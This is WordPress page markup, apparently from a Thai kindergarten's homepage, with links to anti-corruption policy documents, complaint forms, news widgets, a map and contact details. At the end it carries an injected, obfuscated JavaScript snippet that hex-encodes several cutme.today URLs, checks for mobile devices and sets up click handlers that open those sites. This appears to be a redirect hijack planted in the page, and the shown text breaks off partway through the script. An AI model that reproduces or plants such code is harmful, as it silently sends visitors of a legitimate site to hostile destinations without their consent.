900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const 